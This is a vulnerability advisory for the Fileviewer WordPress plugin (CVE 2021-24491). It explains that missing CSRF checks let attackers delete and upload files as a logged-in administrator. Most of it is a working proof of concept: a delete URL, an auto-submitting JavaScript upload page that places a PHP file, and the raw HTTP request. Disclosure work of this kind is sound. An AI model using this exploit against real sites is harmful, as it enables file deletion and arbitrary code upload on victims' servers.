Fileviewer <= 2.2 – Arbitrary File Upload/Deletion via CSRF | CVE 2021-24491

Description

The plugin does not have CSRF checks in place when performing actions such as upload and delete files. As a result, attackers could make a logged in administrator delete and upload arbitrary files via a CSRF attack

Proof of Concept

To delete /phpinfo.php: https://example.com/wp-admin/admin.php?page=fileviewer&f=&d=phpinfo.php

To upload a phpinfo.php at /

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin.php?page=fileviewer&u=true&f=", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------2311600223115317505662215654");
        xhr.withCredentials = true;
        var body = "-----------------------------2311600223115317505662215654\r\n" + 
          "Content-Disposition: form-data; name=\"viev_fw_file\"; filename=\"phpinfo.php\"\r\n" + 
          "Content-Type: text/php\r\n" + 
          "\r\n" + 
          "\x3c?php phpinfo() ?\x3e\n" + 
          "\r\n" + 
          "-----------------------------2311600223115317505662215654--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

POST /wp-admin/admin.php?page=fileviewer&u=true&f= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2311600223115317505662215654
Content-Length: 244
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------2311600223115317505662215654
Content-Disposition: form-data; name="viev_fw_file"; filename="phpinfo.php"
Content-Type: text/php

<?php phpinfo() ?>

-----------------------------2311600223115317505662215654--


Uploaded file will be at https://example.com/phpinfo.php